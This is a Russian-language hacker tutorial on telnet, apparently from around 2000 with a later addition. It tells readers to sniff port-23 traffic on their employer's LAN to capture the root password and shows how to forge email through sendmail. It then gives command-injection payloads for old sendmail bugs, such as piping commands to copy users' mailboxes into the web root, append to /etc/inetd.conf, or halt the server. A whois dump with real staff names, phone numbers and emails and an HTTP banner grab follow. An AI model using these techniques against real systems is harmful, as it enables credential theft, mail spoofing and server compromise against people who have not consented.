Учимся использовать Telnet
Часть первая. Хочу но не могу. Зачастую меня спрашивают, "Как типа телнет
поюзать?" Гммм, ну начнем с того что "телнет" в привычном понимании - это всего
лишь терминал, который позволяет несчастному юзеру стать клиентом какого-нибудь
сервиса завязанного на TCP/IP. Соответственно, для начала нужно определиться,
куда нам нужно и нужно ли нам это... Часто задаваемый вопрос номер два, а где
мне взять телнет клиента(терминал)? Ну большинство начинающих странников (от
слова странный) даже не догадываются о том, что телнет клиент уже стоит на
машине) вызовите командную строку дос и наберите там telnet (при условии, что вы
уже подключены в сеть). Добрый windows порадует вас на редкость кривым клиентом,
не имеющим возможности настройки типа терминала.Гораздо более приятно
пользоваться универсальным клиентом SecureCRT (http://www.vandyke.com).Если у
тебя стоит Linux или BSD ,то ты уже достиг могущества и тебе осталось в X`ах
вызвать консоль и набрать telnet. Коннект производится так:
telnet
hostname/IP port
Где hostname/IP - имя хоста/IP на который ты решил
повеситься, port - номер порта, через который ты собрался иметь удаленную
систему.
Часть Вторая. Безвозвратно погибшее
прошлое. Итак для чего изачально был нужен этот чудо
терминал? Для коннекта на порт 23, который использует UNIX telnetd, то бишь
телнетный демон. В результате, после ввода имени пользователя и пароля ты
вываливаешся прямо в shell и можешь управлять (с правами назначенными тебе
админом) удаленной машиной так же, как будто ты сидишь непосредственно за ней.
Но в сем сервисе было столько багов, что умные люди его давно пофиксили и
перешли на SSH. Основная проблема в том, что юзер, нюхающий траффик в локалке по
23 порту может без проблем прочитать админовские login&password (никакого
шифрования) сплошной plain text. БРРРРРР. Но если ты, находясь в локальной сети
своей организации, набрал telnet servername и увидел нечто типа:
Linux RedHat
6.0 login
Значит ты теперь можешь смело включать сниффер на 23 порт и
ловить пакетики. Ну за один рабочий день ты наверняка получишь рутовый логин и
пароль.
Часть Третья. SendMail зачастую все еще
дыряв. Гммм. Ну нафига нам сперся 23 порт? Попробуем
поиметь через 25, то бишь sendmail. Выглядит это примерно так:
telnet
hostname 25
Trying
194.68.13.231...
Connected to gwx3.host.ru.
Escape
character is '^]'.
220 gwx3.host.ru ESMTP Sendmail 8.9.3/8.9.3; Tue,
1 Aug 2000 08:54:59 +0400
УРА ты повесился напрямую на 25
порт что дальше? Дальше поздороваемся:
HELO domainname.com
(кстати имя домена может быть любое, но желательно реально существующее
к примеру YAHOO.COM) далее пишем от кого письмо:
mail from : billgates@microsoft.com -
вот тебе и анонимность ....)))
теперь кому:
rcpt to :
username
username - имя юзера которому шлем мыло, root - есть
всегда))))) ну теперь сама мессага:
data - жмем Enter здесь
печатаем текст.
для того чтобы закончить послание ставим .(точку) и жмем
Enter
quit - валим отсюда))
ВСЕ!!! мы только что
отправили вполне анонимное мыло без всяких там клиентов))) Радость в том ,что
, зачастую, в sendmail есть следующие баги: 1. mail from :
sendername|any_command_as_U_want - возможность выполнения любой UNIX
команды
rcpt to : username|any_command_as_U_want - возможность
выполнения любой UNIX команды 2. rcpt to :
/any_directory/any_filename - возможность направить мессагу напрямую в
файл))) Один гражданин ,назвавший себя VIRUSMAN недавно прислал письмо где
был следующий вопрос: "А что мне это дает?" Ну что я могу сказать
......... В первом случае можно сделать нечто типа:
/bin/ls
/var/spool/mail>/home/httpd/html/users_info.txt - получаем список
почтовых юзерей
/bin/cat
/var/spool/mail/username>/home/httpd/html/user_box.txt - получаем
контент ящика юзера.
/bin/echo
any_commands_here>>/etc/inetd.conf - добавляем произвольные команды в
конец инет демона)).
/sbin/halt - паркуем сервак))) и
т.д....
Во втором случае
...))) Ну попробуй подумать, пиши что хочешь и куда хочешь))) Можно дописать
произвольные команды скажем в /etc/inetd.conf ... все зависит от твоей
фантазии.
Часть четвертая, прикладная
пауза. Ты конечно уже юзал проги которые определят
провайдера по IP)) Срочно сотри их, больше никогда не юзай - вспомни про http://www.ripe.net.
На RIPE.NET запросы
делаются так:
telnet whois.ripe.net 43
Trying
193.0.0.129...
Connected to whois.ripe.net.
Escape
character is '^]'.
194.87.0.50 - пишем айпишник и получаем
подробную инфу кто это и откуда.
% Rights
restricted by copyright.
See
http://www.ripe.net/ripencc/pub-services/db/copyright.html
inetnum:
194.87.0.0 - 194.87.3.255
netname: DEMOS-CORP
descr:
DEMOS Corporate Network
descr: Demos Plus Co.
Ltd.
descr: Moscow, Russia
country:
RU
admin-c: PA75
tech-c: ED12-RIPE
tech-c:
GB90-RIPE
tech-c: GK41-RIPE
status: ASSIGNED
PA
mnt-by: AS2578-MNT
changed: eugen@demos.net
19970313
changed:
galka@demos.net
19990804
source:
RIPE
route: 194.87.0.0/19
descr:
DEMOS
origin: AS2578
notify: noc@demos.net
mnt-by:
AS2578-MNT
changed: eugen@demos.net
19970627
source:
RIPE
person: Paul Antonov
address: Demos Plus
Ltd.
address: Ovchinnikovskaya nab. 6/1
address: Moscow
113035
address: Russia
phone: +7 095
9566233
phone: +7 095 9566234
fax-no: +7 095
9565042
e-mail: apg@demos.net
nic-hdl:
PA75
changed: apg@demos.net
19960618
source:
RIPE
person: Evgeny R Didenko
address:
Demos-Internet JSC
address: 6-1 Ovchinnikovskaya
nab.
address: Moscow 113035
address:
Russia
phone: +7 095 737-0436
phone: +7 095
737-0400
fax-no: +7 095 233 5016
e-mail:
eugen@demos.net
nic-hdl:
ED12-RIPE
notify: eugen@demos.net
changed:
eugen@demos.net
19960415
changed:
eugen@demos.net
19991230
source:
RIPE
person: Gera V Bragin
address: Demos Company
Ltd.
address: 6-1 Ovchinnikovskaya nab.
address: Moscow
113035
address: Russia
phone: +7 095 737
0436
phone: +7 095 737 0400
fax-no: +7 095 956
5042
e-mail: gera@demos.net
nic-hdl:
GB90-RIPE
notify: gera@demos.net
changed:
gera@demos.net
19970105
changed:
galka@demos.net
19991104
source:
RIPE
person: Galina Kovalenko
address: Genesys
Telecommunications Lab.
address: 11, 2nd Obydenskiy
pereulok
address: Moscow 119034
address:
Russia
phone: +7 095 255 7940
fax-no: +7 095 255
7941
e-mail: galka@genesyslab.ru
nic-hdl:
GK41-RIPE
remarks: +7 095 255 7940 ext 2051
notify:
galka@genesyslab.ru
changed:
galka@genesyslab.ru
20000731
source:
RIPE
Connection closed by foreign host.
Часть пятая, узнаем версию веб-сервера и установленного на нем ПО. Узнать данную информацию, если у вас установлен веб-сервер Apache может практически любой человек. Для этого есть различные способы, но самый простой метод заключается в использовании telnet подключения на порт 80 удаленного сервера и запроса "HEAD / HTTP/1.0” :
telnet remote_server.com 80 Trying remote_server.com... Connected to remote_server.com. Escape character is '^]'. HEAD / HTTP/1.0 <- after this press 2 times ENTER HTTP/1.1 200 OK
Date: Fri, 09 Jun 2006 08:18:06 GMT Server: Apache/2.0.55 (Debian) PHP/5.1.2-1+b1 mod_ssl/2.0.55 OpenSSL/0.9.8b Connection: close Content-Type: text/html; charset=UTF-8 Connection closed by foreign host.
Как вы можете увидеть выше, простой командой мы узнали довольно много информации о удаленном сервере: Debian в качестве ОС, , Apache 2.0.55 в качестве веб-сервера, PHP 5.1.2, и OpenSSL 0.9.8b… Хммм, а не слишком ли он разговорчив? В следующих статьях я покажу как можно скрыть данную информацию о системе.
Источник: http://www.inattack.ru |